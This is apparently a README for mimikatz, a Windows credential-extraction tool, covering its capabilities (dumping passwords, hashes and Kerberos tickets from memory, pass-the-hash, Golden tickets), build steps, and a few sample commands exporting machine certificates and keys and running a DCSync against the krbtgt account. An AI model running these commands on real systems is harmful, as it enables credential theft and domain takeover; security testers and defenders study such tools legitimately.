mimikatz is a tool I’ve made to learn C and make somes experiments with Windows security.
It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.
mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
+ for mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 – http://www.microsoft.com/download/details.aspx?id=44914)
+ for mimikatz driver, mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) – http://www.microsoft.com/download/details.aspx?id=11800
mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =)
Build the solution:
+Download zip file, then unzip it
+ risht click open with visual studio isual Studio 2012 or 2013 after
+ After opening the solution, Build / Build Solution (you can change architecture)
+ mimikatz is now built and ready to be used! (Win32 / x64)
-- you can have error MSB3073 about _build_.cmd and mimidrv, it's because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK.
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /machine /export
* vault & lsadump
lsadump::dcsync /user:domain\krbtgt /domain:lab.local